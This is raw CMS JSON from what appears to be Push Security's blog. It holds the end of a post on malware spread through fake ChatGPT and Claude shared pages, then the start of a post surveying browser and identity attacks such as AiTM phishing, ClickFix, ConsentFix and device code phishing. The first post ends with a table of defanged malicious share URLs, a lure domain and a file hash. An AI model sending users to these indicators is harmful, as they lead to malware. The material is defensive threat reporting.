",[],{},{"nodeType":237,"data":838,"content":839},{},[840],{"nodeType":241,"value":841,"marks":842,"data":843},"Push customers do not need to take any further action.",[],{},{"nodeType":320,"data":845,"content":846},{},[],{"nodeType":237,"data":848,"content":849},{},[850],{"nodeType":241,"value":851,"marks":852,"data":853},"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.",[],{},{"nodeType":237,"data":855,"content":856},{},[857],{"nodeType":241,"value":858,"marks":859,"data":860},"Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.",[],{},{"nodeType":237,"data":862,"content":863},{},[864,867,876],{"nodeType":241,"value":29,"marks":865,"data":866},[],{},{"nodeType":260,"data":868,"content":870},{"uri":869},"https://pushsecurity.com/demo/",[871],{"nodeType":241,"value":872,"marks":873,"data":875},"Book a live demo to learn more.",[874],{"type":573},{},{"nodeType":241,"value":29,"marks":877,"data":878},[],{},{"nodeType":320,"data":880,"content":881},{},[],{"nodeType":324,"data":883,"content":884},{},[885],{"nodeType":241,"value":886,"marks":887,"data":889},"Indicators of compromise",[888],{"type":313},{},{"nodeType":237,"data":891,"content":892},{},[893,897,905],{"nodeType":241,"value":894,"marks":895,"data":896},"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to 
",[],{},{"nodeType":260,"data":898,"content":900},{"uri":899},"https://phishing-techniques.pushsecurity.com/techniques/domain-rotation-redirection/",[901],{"nodeType":241,"value":902,"marks":903,"data":904},"quickly spin up and rotate the sites used",[],{},{"nodeType":241,"value":906,"marks":907,"data":908}," in the attack chain. IoC-based detections for campaigns like this are of limited value.",[],{},{"nodeType":237,"data":910,"content":911},{},[912],{"nodeType":241,"value":913,"marks":914,"data":915},"At the time of writing, the indicators observed were:",[],{},{"nodeType":917,"data":918,"content":919},"table",{},[920,947,971,993,1016],{"nodeType":921,"data":922,"content":923},"table-row",{},[924,936],{"nodeType":925,"data":926,"content":927},"table-header-cell",{},[928],{"nodeType":237,"data":929,"content":930},{},[931],{"nodeType":241,"value":932,"marks":933,"data":935},"Indicator",[934],{"type":313},{},{"nodeType":925,"data":937,"content":938},{},[939],{"nodeType":237,"data":940,"content":941},{},[942],{"nodeType":241,"value":943,"marks":944,"data":946},"Type",[945],{"type":313},{},{"nodeType":921,"data":948,"content":949},{},[950,961],{"nodeType":951,"data":952,"content":953},"table-cell",{},[954],{"nodeType":237,"data":955,"content":956},{},[957],{"nodeType":241,"value":958,"marks":959,"data":960},"hxxps://claude[.]ai/share/8e6401b5-4849-46c4-a3cb-29e1c3c49131",[],{},{"nodeType":951,"data":962,"content":963},{},[964],{"nodeType":237,"data":965,"content":966},{},[967],{"nodeType":241,"value":968,"marks":969,"data":970},"URL",[],{},{"nodeType":921,"data":972,"content":973},{},[974,984],{"nodeType":951,"data":975,"content":976},{},[977],{"nodeType":237,"data":978,"content":979},{},[980],{"nodeType":241,"value":981,"marks":982,"data":983},"hxxps://chatgpt[.]com/s/cb_6a0f1e6bbec88191aa7fede27163f08d",[],{},{"nodeType":951,"data":985,"content":986},{},[987],{"nodeType":237,"data":988,"content":989},{},[990],{"nodeType":241,"value":968,"marks":991,"data":992},[],{}
,{"nodeType":921,"data":994,"content":995},{},[996,1006],{"nodeType":951,"data":997,"content":998},{},[999],{"nodeType":237,"data":1000,"content":1001},{},[1002],{"nodeType":241,"value":1003,"marks":1004,"data":1005},"openew[.]app",[],{},{"nodeType":951,"data":1007,"content":1008},{},[1009],{"nodeType":237,"data":1010,"content":1011},{},[1012],{"nodeType":241,"value":1013,"marks":1014,"data":1015},"Domain",[],{},{"nodeType":921,"data":1017,"content":1018},{},[1019,1029],{"nodeType":951,"data":1020,"content":1021},{},[1022],{"nodeType":237,"data":1023,"content":1024},{},[1025],{"nodeType":241,"value":1026,"marks":1027,"data":1028},"de8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78",[],{},{"nodeType":951,"data":1030,"content":1031},{},[1032],{"nodeType":237,"data":1033,"content":1034},{},[1035],{"nodeType":241,"value":1036,"marks":1037,"data":1038},"SHA256",[],{},{"nodeType":237,"data":1040,"content":1041},{},[1042],{"nodeType":241,"value":29,"marks":1043,"data":1044},[],{},{"entries":1046},{"hyperlink":1047,"inline":1048,"block":1049},[],[],[1050,1058,1085,1092,1099,1106,1113,1121,1128,1135],{"sys":1051,"__typename":1052,"title":1053,"caption":62,"layoutMode":62,"file":1054},{"id":296},"Image","LLMShare pages side by side",{"url":1055,"width":1056,"height":1057},"https://images.ctfassets.net/y1cdw1ablpvd/7u7yyvyg3P9jepZi7iIwxf/d2c42d257d2e7ac4dfe28c37aa69a4b3/image4.png",1999,875,{"sys":1059,"__typename":1060,"content":1061,"name":1084,"title":62},{"id":304},"InsightTextBlockComponent",{"json":1062},{"nodeType":233,"data":1063,"content":1064},{},[1065],{"nodeType":237,"data":1066,"content":1067},{},[1068,1072,1080],{"nodeType":241,"value":1069,"marks":1070,"data":1071},"These are essentially InstallFix attacks — a variant of the ClickFix family that",[],{},{"nodeType":260,"data":1073,"content":1075},{"uri":1074},"https://pushsecurity.com/blog/installfix/",[1076],{"nodeType":241,"value":1077,"marks":1078,"data":1079}," Push documented earlier this 
year",[],{},{"nodeType":241,"value":1081,"marks":1082,"data":1083}," — and they exploit the fact that AI tools have normalized command-line installation workflows for a population of users who lack the experience to distinguish a legitimate terminal command from a malicious one. ",[],{},"LLMShare IB1",{"sys":1086,"__typename":1052,"title":1087,"caption":1088,"layoutMode":62,"file":1089},{"id":360},"LLMShare error page","The fake \"high traffic\" page rendered inside a ChatGPT shared content URL. Note the \"Show code\" and \"Remix with ChatGPT\" buttons at the top, which reveal that this is actually rendered HTML/CSS code rather than a real ChatGPT system page.",{"url":1090,"width":1056,"height":1091},"https://images.ctfassets.net/y1cdw1ablpvd/soQtEPyX9aQUfby2Ylm7m/0bb772950b7e3598a343f1609a955ed4/image3.png",1750,{"sys":1093,"__typename":1052,"title":1094,"caption":1095,"layoutMode":62,"file":1096},{"id":380},"LLMShare panel showing source code","The same page with the code panel open, showing the HTML/CSS source code that generates the fake service disruption notice.",{"url":1097,"width":1056,"height":1098},"https://images.ctfassets.net/y1cdw1ablpvd/22IO2J68rUGy5ZzEAGfFIh/ff98ca14ed74de0c35e5154c43aa1524/image7.png",1128,{"sys":1100,"__typename":1052,"title":1101,"caption":1102,"layoutMode":62,"file":1103},{"id":404},"LLMShare page with download panel","The fake ChatGPT download page hosted at openew[.]app. 
The design closely replicates OpenAI's legitimate download page.",{"url":1104,"width":1056,"height":1105},"https://images.ctfassets.net/y1cdw1ablpvd/4woFKeexapLYHfpKfCzEbo/8b7fc45a933af8fea5f6bce97823e123/image2.png",1210,{"sys":1107,"__typename":1052,"title":1108,"caption":1109,"layoutMode":62,"file":1110},{"id":410},"Real ChatGPT download page for comparison at chatgpt.com/download.","Real ChatGPT download page for comparison at chatgpt.com/download.",{"url":1111,"width":1056,"height":1112},"https://images.ctfassets.net/y1cdw1ablpvd/3hHpXRmxJyRPs4y1SQbHMM/67e33342db5ecb1e3928bb8e1a56749a/image5.png",1142,{"sys":1114,"__typename":1052,"title":1115,"caption":1116,"layoutMode":62,"file":1117},{"id":449},"Alternative LLMShare page for bot visitors","What URLScan sees when visiting the same openew[.]app URL: a generic \"Openew\" AR/VR company website with no trace of the ChatGPT impersonation.",{"url":1118,"width":1119,"height":1120},"https://images.ctfassets.net/y1cdw1ablpvd/apMKHaMjDF9GmoCO1gVHT/c25938faf56bb96b467469209470e40c/image1.png",1600,1200,{"sys":1122,"__typename":1052,"title":1123,"caption":1123,"layoutMode":62,"file":1124},{"id":484},"A shared Claude.ai conversation containing malicious installation instructions in the style previously reported by BleepingComputer.",{"url":1125,"width":1126,"height":1127},"https://images.ctfassets.net/y1cdw1ablpvd/2YLf3kEK2y2XjdyM1Q9uRT/6b5774de9708ff8544889305a094d991/image6.png",1920,945,{"sys":1129,"__typename":1052,"title":1130,"caption":62,"layoutMode":62,"file":1131},{"id":522},"LLMShare 
malvertising",{"url":1132,"width":1133,"height":1134},"https://images.ctfassets.net/y1cdw1ablpvd/1aLEhiVJcLPIR4rXdzoCTv/d87eb30284e61ab813ccf9e662a1fbae/image.png",1910,1005,{"sys":1136,"__typename":1060,"content":1137,"name":1172,"title":62},{"id":528},{"json":1138},{"nodeType":233,"data":1139,"content":1140},{},[1141,1152],{"nodeType":237,"data":1142,"content":1143},{},[1144,1148],{"nodeType":241,"value":1145,"marks":1146,"data":1147},"Although we managed to grab that example, the ads haven't been easy to reproduce.",[],{},{"nodeType":241,"value":1149,"marks":1150,"data":1151}," This is because the ads are likely geographically or temporally scoped. It’s pretty eye-opening (and creepy) how tightly scoped these kinds of sponsored ads can be across different platforms. ",[],{},{"nodeType":237,"data":1153,"content":1154},{},[1155,1159,1168],{"nodeType":241,"value":1156,"marks":1157,"data":1158},"This is one of the key misconceptions people can have about this kind of attack. It’s easy to see it as untargeted, when realistically it can be scoped tightly to a desired victim population by role, geography, and so on. We’ve written about this previously in ",[],{},{"nodeType":260,"data":1160,"content":1162},{"uri":1161},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis/",[1163],{"nodeType":241,"value":1164,"marks":1165,"data":1167},"our blog",[1166],{"type":573},{},{"nodeType":241,"value":1169,"marks":1170,"data":1171}," on the ad account takeover > malvertising ecosystem. 
",[],{},"LLMShare IB2","json",{},"LLMShare: using shared chatbot pages to distribute malware","2026-05-29T00:00:00.000Z",{"items":1178},[1179,2054,3082],{"__typename":1180,"sys":1181,"publishedDate":1183,"content":1184,"title":2033,"synopsis":2034,"hashTags":62,"slug":2035,"tagsCollection":2036,"authorsCollection":2046},"BlogPosts",{"id":1182},"211Dd0EIrXPOFpvRgs0fEE","2026-05-08T00:00:00.000Z",{"json":1185},{"data":1186,"content":1187,"nodeType":233},{},[1188,1207,1226,1244,1250,1253,1261,1268,1275,1282,1289,1297,1300,1308,1315,1322,1329,1335,1343,1362,1369,1376,1392,1400,1431,1447,1454,1484,1492,1523,1530,1538,1557,1564,1571,1577,1584,1592,1611,1618,1637,1644,1647,1655,1662,1753,1760,1776,1779,1809,1828,1835,1842,1845,1853,1872,1879,1886,1904,1907,1915,1922,1955,1962,1979,1998,2004,2007,2014],{"data":1189,"content":1190,"nodeType":237},{},[1191,1195,1203],{"data":1192,"marks":1193,"value":1194,"nodeType":241},{},[],"When we released the",{"data":1196,"content":1198,"nodeType":260},{"uri":1197},"https://pushsecurity.com/blog/saas-attack-techniques/",[1199],{"data":1200,"marks":1201,"value":1202,"nodeType":241},{},[]," SaaS attack matrix",{"data":1204,"marks":1205,"value":1206,"nodeType":241},{},[]," in 2023, we were anticipating a shift that was just beginning to take shape. 
The techniques that attackers were using to compromise cloud applications and identities weren't well represented in existing frameworks, and many of the ones we documented hadn't yet been widely observed in the wild.",{"data":1208,"content":1209,"nodeType":237},{},[1210,1214,1222],{"data":1211,"marks":1212,"value":1213,"nodeType":241},{},[],"A year later, we",{"data":1215,"content":1217,"nodeType":260},{"uri":1216},"https://pushsecurity.com/blog/the-saas-attack-matrix-one-year-on/",[1218],{"data":1219,"marks":1220,"value":1221,"nodeType":241},{},[]," reviewed what had changed",{"data":1223,"marks":1224,"value":1225,"nodeType":241},{},[]," and found that the initial access phase — the techniques designed to compromise an identity in the first place — was where almost all of the attacker innovation was concentrated. And two years on, that trend has become the story of the modern threat landscape. ",{"data":1227,"content":1228,"nodeType":237},{},[1229,1233,1240],{"data":1230,"marks":1231,"value":1232,"nodeType":241},{},[],"Today, we're re-releasing the matrix as the",{"data":1234,"content":1235,"nodeType":260},{"uri":61},[1236],{"data":1237,"marks":1238,"value":1239,"nodeType":241},{},[]," Browser & Identity Attacks Matrix",{"data":1241,"marks":1242,"value":1243,"nodeType":241},{},[],". The name change isn't cosmetic. 
It reflects that the attacks driving the most consequential breaches are browser-based and identity-first.",{"data":1245,"content":1249,"nodeType":292},{"target":1246},{"sys":1247},{"id":1248,"type":297,"linkType":298},"MSnrBRJtiQxpv2qxFLCVE",[],{"data":1251,"content":1252,"nodeType":320},{},[],{"data":1254,"content":1255,"nodeType":324},{},[1256],{"data":1257,"marks":1258,"value":1260,"nodeType":241},{},[1259],{"type":313},"Why the scope needed to change",{"data":1262,"content":1263,"nodeType":237},{},[1264],{"data":1265,"marks":1266,"value":1267,"nodeType":241},{},[],"The original SaaS attack matrix was built around a specific insight: that attacks targeting modern business applications played out entirely over the internet, without touching endpoints or internal networks in any way that EDR or network detection tools would recognize.",{"data":1269,"content":1270,"nodeType":237},{},[1271],{"data":1272,"marks":1273,"value":1274,"nodeType":241},{},[],"That framing was useful, and it remains true. But it anchored the matrix to the post-access phase — what attackers do once they're inside a SaaS application — and didn't give enough weight to the initial access techniques that determine whether attackers get there in the first place.",{"data":1276,"content":1277,"nodeType":237},{},[1278],{"data":1279,"marks":1280,"value":1281,"nodeType":241},{},[],"The problem is that initial access is where the overwhelming majority of attacker innovation and investment is concentrated, and the techniques being used to achieve it are best understood as browser and identity attacks rather than SaaS-specific ones. 
AiTM phishing, ClickFix and its growing family of clipboard-injection variants, device code phishing, OAuth consent abuse, credential stuffing powered by infostealer supply chains, and malicious browser extensions — all of these happen in or via the browser.",{"data":1283,"content":1284,"nodeType":237},{},[1285],{"data":1286,"marks":1287,"value":1288,"nodeType":241},{},[],"Another issue is that \"SaaS\" has arguably ceased to be a meaningful category. When we consider that most organizations run the majority of their business on cloud applications, the difference between what constitutes \"SaaS\" versus cloud versus just \"business IT\" is pretty blurry (and feels like an academic rather than practical difference).",{"data":1290,"content":1291,"nodeType":237},{},[1292],{"data":1293,"marks":1294,"value":1296,"nodeType":241},{},[1295],{"type":313},"So it's less about whether an attack is a \"SaaS attack\" and more about how these attacks actually play out. ",{"data":1298,"content":1299,"nodeType":320},{},[],{"data":1301,"content":1302,"nodeType":324},{},[1303],{"data":1304,"marks":1305,"value":1307,"nodeType":241},{},[1306],{"type":313},"The technique landscape has transformed",{"data":1309,"content":1310,"nodeType":237},{},[1311],{"data":1312,"marks":1313,"value":1314,"nodeType":241},{},[],"The second part of the change is that the scale and speed of attacker innovation in the space justify it.",{"data":1316,"content":1317,"nodeType":237},{},[1318],{"data":1319,"marks":1320,"value":1321,"nodeType":241},{},[],"When we launched the matrix in mid-2023, AiTM phishing was emerging as a serious concern but was far from ubiquitous. ClickFix didn't exist as a named technique. Device code phishing was a curiosity documented by a handful of researchers. ConsentFix was years away from being discovered. 
Browser extension supply chain attacks were rare enough to be individually notable.",{"data":1323,"content":1324,"nodeType":237},{},[1325],{"data":1326,"marks":1327,"value":1328,"nodeType":241},{},[],"In the two and a half years since, every one of these has become a mainstream, industrialized attack technique — and several have converged in ways that would have been hard to predict.",{"data":1330,"content":1334,"nodeType":292},{"target":1331},{"sys":1332},{"id":1333,"type":297,"linkType":298},"5Kw2kSrL8u4VyslxK8HCtR",[],{"data":1336,"content":1337,"nodeType":605},{},[1338],{"data":1339,"marks":1340,"value":1342,"nodeType":241},{},[1341],{"type":313},"AiTM phishing has become the default phishing method",{"data":1344,"content":1345,"nodeType":237},{},[1346,1350,1358],{"data":1347,"marks":1348,"value":1349,"nodeType":241},{},[],"AiTM phishing is now the standard, powered by Phishing-as-a-Service kits that operate with the release cycles and customer support of legitimate SaaS products. Tycoon 2FA alone accounted for",{"data":1351,"content":1353,"nodeType":260},{"uri":1352},"https://pushsecurity.com/blog/2025-top-phishing-trends/",[1354],{"data":1355,"marks":1356,"value":1357,"nodeType":241},{},[]," 62% of phishing detected by Microsoft",{"data":1359,"marks":1360,"value":1361,"nodeType":241},{},[]," and over 64,000 confirmed incidents, with Sneaky2FA, FlowerStorm, Evilginx, and a growing roster of competitors filling out the marketplace.",{"data":1363,"content":1364,"nodeType":237},{},[1365],{"data":1366,"marks":1367,"value":1368,"nodeType":241},{},[],"AiTM is constantly evolving, with vendors adding new features, capabilities, detection evasion techniques, and so on. 
Abuse of legitimate platforms, and increasingly AI-assisted development, mean that it’s trivial for attackers to spin up and tear down infrastructure, scale their campaigns, and target specific organizations with crafted pages and lures — in short, attackers can operate highly sophisticated attacks with minimal effort and complexity.",{"data":1370,"content":1371,"nodeType":237},{},[1372],{"data":1373,"marks":1374,"value":1375,"nodeType":241},{},[],"These kits are delivered across several browser-based channels — not just email. Push data consistently shows that roughly 1 in 3 phishing payloads we intercept arrive via social media, search ads, messaging apps, or other non-email vectors.",{"data":1377,"content":1378,"nodeType":237},{},[1379,1383,1388],{"data":1380,"marks":1381,"value":1382,"nodeType":241},{},[],"Vishing has also surged as a delivery channel — CrowdStrike documented a ",{"data":1384,"marks":1385,"value":1387,"nodeType":241},{},[1386],{"type":313},"442% year-over-year increase",{"data":1389,"marks":1390,"value":1391,"nodeType":241},{},[],", and Mandiant found it was the single most common initial vector in cloud compromises at 23%. But the trend that matters isn't voice calls in isolation; it's voice calls combined with browser-based payloads, where a live operator guides the victim into an AiTM page or device code flow that the call alone could not execute.",{"data":1393,"content":1394,"nodeType":605},{},[1395],{"data":1396,"marks":1397,"value":1399,"nodeType":241},{},[1398],{"type":313},"ClickFix is the top reported initial access vector",{"data":1401,"content":1402,"nodeType":237},{},[1403,1407,1415,1419,1427],{"data":1404,"marks":1405,"value":1406,"nodeType":241},{},[],"ClickFix has gone from nonexistent to one of the most prevalent initial access techniques in under 18 months. 
Microsoft reported it as the",{"data":1408,"content":1410,"nodeType":260},{"uri":1409},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf",[1411],{"data":1412,"marks":1413,"value":1414,"nodeType":241},{},[]," most common initial access vector in 2025",{"data":1416,"marks":1417,"value":1418,"nodeType":241},{},[],", accounting for 47% of observed attacks, while CrowdStrike documented a",{"data":1420,"content":1422,"nodeType":260},{"uri":1421},"https://www.crowdstrike.com/explore/2026-global-threat-report",[1423],{"data":1424,"marks":1425,"value":1426,"nodeType":241},{},[]," 563% increase",{"data":1428,"marks":1429,"value":1430,"nodeType":241},{},[]," in fake CAPTCHA lures (a top ClickFix style).",{"data":1432,"content":1433,"nodeType":237},{},[1434,1438,1443],{"data":1435,"marks":1436,"value":1437,"nodeType":241},{},[],"ClickFix is admittedly an outlier in a browser attacks matrix — the payload ultimately executes on the endpoint, not in the browser — but the delivery is overwhelmingly browser-based: ",{"data":1439,"marks":1440,"value":1442,"nodeType":241},{},[1441],{"type":313},"4 in 5 ClickFix payloads",{"data":1444,"marks":1445,"value":1446,"nodeType":241},{},[]," intercepted by Push arrive via search engines as a result of malvertising or compromised web pages, not email, which means the browser is the only control point that actually sees the attack before the user pastes the malicious command.",{"data":1448,"content":1449,"nodeType":237},{},[1450],{"data":1451,"marks":1452,"value":1453,"nodeType":241},{},[],"ClickFix is now the primary delivery mechanism for infostealer malware, which is in turn the primary source of the stolen credentials and session tokens that power credential stuffing and session hijacking — which means the technique sits at the start of a cycle where one class of browser-delivered attack generates the raw material for the 
next.",{"data":1455,"content":1456,"nodeType":237},{},[1457,1461,1468,1472,1480],{"data":1458,"marks":1459,"value":1460,"nodeType":241},{},[],"The success of ClickFix has predictably spawned a growing family of derivatives — FileFix, CrashFix,",{"data":1462,"content":1463,"nodeType":260},{"uri":1074},[1464],{"data":1465,"marks":1466,"value":1467,"nodeType":241},{},[]," InstallFix",{"data":1469,"marks":1470,"value":1471,"nodeType":241},{},[]," — and much of the naming is marketing hype around variations on the same clipboard-injection mechanic. But",{"data":1473,"content":1475,"nodeType":260},{"uri":1474},"https://pushsecurity.com/blog/consentfix/",[1476],{"data":1477,"marks":1478,"value":1479,"nodeType":241},{},[]," ConsentFix",{"data":1481,"marks":1482,"value":1483,"nodeType":241},{},[]," was a genuinely novel development.",{"data":1485,"content":1486,"nodeType":605},{},[1487],{"data":1488,"marks":1489,"value":1491,"nodeType":241},{},[1490],{"type":313},"Browser-native ClickFix: ConsentFix",{"data":1493,"content":1494,"nodeType":237},{},[1495,1499,1507,1511,1519],{"data":1496,"marks":1497,"value":1498,"nodeType":241},{},[],"ConsentFix is a fully browser-native attack that merged ClickFix-style social engineering with OAuth consent abuse, compromising accounts through a legitimate Microsoft authorization flow with no endpoint component at all. 
ConsentFix was",{"data":1500,"content":1502,"nodeType":260},{"uri":1501},"https://pushsecurity.com/blog/consentfix-debrief/",[1503],{"data":1504,"marks":1505,"value":1506,"nodeType":241},{},[]," traced to APT29",{"data":1508,"marks":1509,"value":1510,"nodeType":241},{},[]," and has since been",{"data":1512,"content":1514,"nodeType":260},{"uri":1513},"https://pushsecurity.com/blog/consentfix-v3-analyzing-a-new-toolkit/",[1515],{"data":1516,"marks":1517,"value":1518,"nodeType":241},{},[]," commercialized on criminal forums",{"data":1520,"marks":1521,"value":1522,"nodeType":241},{},[],", following the same path from state-sponsored technique to commodity criminal tooling that we've seen repeatedly in this space.",{"data":1524,"content":1525,"nodeType":237},{},[1526],{"data":1527,"marks":1528,"value":1529,"nodeType":241},{},[],"ConsentFix demonstrates that the clipboard-injection mechanic can evolve into something that operates entirely within the browser, eliminating the endpoint detection surface that traditional ClickFix still exposed.",{"data":1531,"content":1532,"nodeType":605},{},[1533],{"data":1534,"marks":1535,"value":1537,"nodeType":241},{},[1536],{"type":313},"Attackers have pivoted to authorization attacks to get around login controls",{"data":1539,"content":1540,"nodeType":237},{},[1541,1545,1553],{"data":1542,"marks":1543,"value":1544,"nodeType":241},{},[],"Authorization attacks like device code phishing have seen a",{"data":1546,"content":1548,"nodeType":260},{"uri":1547},"https://pushsecurity.com/blog/device-code-phishing/",[1549],{"data":1550,"marks":1551,"value":1552,"nodeType":241},{},[]," 37.5x increase",{"data":1554,"marks":1555,"value":1556,"nodeType":241},{},[]," since the start of 2026, with at least 12 distinct kits now offering the technique. It bypasses standard authentication controls — including passkeys — because the attack occurs through the OAuth device authorization flow rather than the standard login flow. 
",{"data":1558,"content":1559,"nodeType":237},{},[1560],{"data":1561,"marks":1562,"value":1563,"nodeType":241},{},[],"The technique was first associated with nation-state actors like Storm-2372, but went from espionage-grade to commodity PhaaS tooling in roughly eighteen months, with kits like EvilTokens and Venom now offering turnkey device code phishing as a service.",{"data":1565,"content":1566,"nodeType":237},{},[1567],{"data":1568,"marks":1569,"value":1570,"nodeType":241},{},[],"The device code authorization is effectively performed post-authentication. If you already have an active session in your browser, entering the device code and selecting your account from a drop-down menu is all that's needed. No password or MFA required. You can see an example in the video below.",{"data":1572,"content":1576,"nodeType":292},{"target":1573},{"sys":1574},{"id":1575,"type":297,"linkType":298},"2WPb41lNRajdpt5pogQg8M",[],{"data":1578,"content":1579,"nodeType":237},{},[1580],{"data":1581,"marks":1582,"value":1583,"nodeType":241},{},[],"And the ecosystem is adapting to this opportunity: established AiTM vendors like Tycoon are adding authorization-focused options alongside their existing credential-harvesting capabilities, which points toward multi-technique platforms where operators pick the right tool for whatever defenses the target has in place.",{"data":1585,"content":1586,"nodeType":605},{},[1587],{"data":1588,"marks":1589,"value":1591,"nodeType":241},{},[1590],{"type":313},"Malicious and hacked browser extensions are one of the fastest growing threats",{"data":1593,"content":1594,"nodeType":237},{},[1595,1599,1607],{"data":1596,"marks":1597,"value":1598,"nodeType":241},{},[],"Malicious browser extensions have matured from an occasional nuisance into a scalable supply chain attack vector. 
The",{"data":1600,"content":1602,"nodeType":260},{"uri":1601},"https://pushsecurity.com/blog/why-browser-extension-risk-scoring-wont-predict-your-next-breach/",[1603],{"data":1604,"marks":1605,"value":1606,"nodeType":241},{},[]," Cyberhaven compromise",{"data":1608,"marks":1609,"value":1610,"nodeType":241},{},[]," in December 2024 — where approximately 35 extensions were weaponized through a single OAuth phishing campaign targeting developers — impacted 2.6 million users and demonstrated that extension supply chain attacks can achieve the kind of reach that used to require a compromised software update server.",{"data":1612,"content":1613,"nodeType":237},{},[1614],{"data":1615,"marks":1616,"value":1617,"nodeType":241},{},[],"Since Cyberhaven, the pace has only accelerated. In 2026 alone, researchers have publicly disclosed at least 250 confirmed malicious browser extensions affecting roughly 1.75 million users, alongside a further 370+ extensions engaged in undisclosed or policy-disclosed data harvesting affecting an additional 44 million users. That doesn't count the extensions from late-2025 campaigns (DarkSpectre, AITOPIA, Trust Wallet) whose impacts carried into 2026.",{"data":1619,"content":1620,"nodeType":237},{},[1621,1625,1633],{"data":1622,"marks":1623,"value":1624,"nodeType":241},{},[],"The attack paths have also expanded. Beyond phishing developers to take over Web Store accounts (the Cyberhaven playbook), attackers are buying existing extensions from developers, waiting for ownership transfers or abandonments to take over, and increasingly vibe-coding their own functional extensions from scratch to build an audience that can later be weaponized. 
The common thread is that ",{"data":1626,"content":1627,"nodeType":260},{"uri":1601},[1628],{"data":1629,"marks":1630,"value":1632,"nodeType":241},{},[1631],{"type":573},"most malicious extensions didn't start out malicious",{"data":1634,"marks":1635,"value":1636,"nodeType":241},{},[]," — they started as legitimate tools and were turned into weapons after the fact.",{"data":1638,"content":1639,"nodeType":237},{},[1640],{"data":1641,"marks":1642,"value":1643,"nodeType":241},{},[],"None of this is happening in isolation. The threat landscape has reoriented around browser-based initial access and identity compromise — and the matrix needed to catch up.",{"data":1645,"content":1646,"nodeType":320},{},[],{"data":1648,"content":1649,"nodeType":324},{},[1650],{"data":1651,"marks":1652,"value":1654,"nodeType":241},{},[1653],{"type":313},"The evolution is playing out in public breaches",{"data":1656,"content":1657,"nodeType":237},{},[1658],{"data":1659,"marks":1660,"value":1661,"nodeType":241},{},[],"It’s worth reinforcing that when the SaaS matrix was first released, many of these attacks hadn’t been seen in the wild. 
The change today is staggering:",{"data":1663,"content":1664,"nodeType":1752},{},[1665,1688,1710,1730],{"data":1666,"content":1667,"nodeType":1687},{},[1668],{"data":1669,"content":1670,"nodeType":237},{},[1671,1675,1683],{"data":1672,"marks":1673,"value":1674,"nodeType":241},{},[],"When",{"data":1676,"content":1678,"nodeType":260},{"uri":1677},"https://pushsecurity.com/blog/scattered-lapsus-hunters/",[1679],{"data":1680,"marks":1681,"value":1682,"nodeType":241},{},[]," Scattered Lapsus$ Hunters",{"data":1684,"marks":1685,"value":1686,"nodeType":241},{},[]," compromised over a thousand organizations' Salesforce tenants through device code phishing, the attack started with a phone call, moved through a browser-based authorization flow for the attacker’s app, and ended with mass data exfiltration via API.","list-item",{"data":1689,"content":1690,"nodeType":1687},{},[1691],{"data":1692,"content":1693,"nodeType":237},{},[1694,1698,1706],{"data":1695,"marks":1696,"value":1697,"nodeType":241},{},[],"When the same collective launched",{"data":1699,"content":1701,"nodeType":260},{"uri":1700},"https://pushsecurity.com/blog/unpacking-the-latest-slh-campaign/",[1702],{"data":1703,"marks":1704,"value":1705,"nodeType":241},{},[]," AiTM phishing campaigns",{"data":1707,"marks":1708,"value":1709,"nodeType":241},{},[]," targeting Okta and Entra SSO, the phishing page was operated by a human in real time and delivered over a voice call — not email.",{"data":1711,"content":1712,"nodeType":1687},{},[1713],{"data":1714,"content":1715,"nodeType":237},{},[1716,1719,1726],{"data":1717,"marks":1718,"value":1674,"nodeType":241},{},[],{"data":1720,"content":1721,"nodeType":260},{"uri":1474},[1722],{"data":1723,"marks":1724,"value":1725,"nodeType":241},{},[]," APT29 deployed ConsentFix",{"data":1727,"marks":1728,"value":1729,"nodeType":241},{},[]," across dozens of compromised websites, the entire attack chain was browser-native, abusing a legitimate Microsoft OAuth flow to bypass MFA 
without proxying a single credential.",{"data":1731,"content":1732,"nodeType":1687},{},[1733],{"data":1734,"content":1735,"nodeType":237},{},[1736,1740,1748],{"data":1737,"marks":1738,"value":1739,"nodeType":241},{},[],"The",{"data":1741,"content":1743,"nodeType":260},{"uri":1742},"https://pushsecurity.com/blog/identity-attacks-in-the-wild/#id-snowflake-june-2024",[1744],{"data":1745,"marks":1746,"value":1747,"nodeType":241},{},[]," Snowflake breach",{"data":1749,"marks":1750,"value":1751,"nodeType":241},{},[]," — arguably the most consequential credential-based campaign of the past several years — saw 165 organizations breached using credentials that had been sitting in infostealer dumps for years, replayed against Snowflake tenants that lacked mandatory MFA. The attack surface wasn't Snowflake's application logic; it was the identity hygiene gap that every organization carries across hundreds of apps.","unordered-list",{"data":1754,"content":1755,"nodeType":237},{},[1756],{"data":1757,"marks":1758,"value":1759,"nodeType":241},{},[],"And that’s just the big picture. Every month we’re tracking new public breaches involving browser and identity TTPs — which again, are just the tip of the iceberg when you consider that many breaches are settled quietly without hitting the headlines. ",{"data":1761,"content":1762,"nodeType":237},{},[1763,1767,1772],{"data":1764,"marks":1765,"value":1766,"nodeType":241},{},[],"One of the key drivers here is the shrinking time-to-exploit. CrowdStrike's average e-crime breakout time is down to ",{"data":1768,"marks":1769,"value":1771,"nodeType":241},{},[1770],{"type":313},"29 minutes",{"data":1773,"marks":1774,"value":1775,"nodeType":241},{},[],", with the fastest recorded at 27 seconds. When attackers can move from initial access to data exfiltration within minutes, the window for post-compromise detection collapses to near zero. 
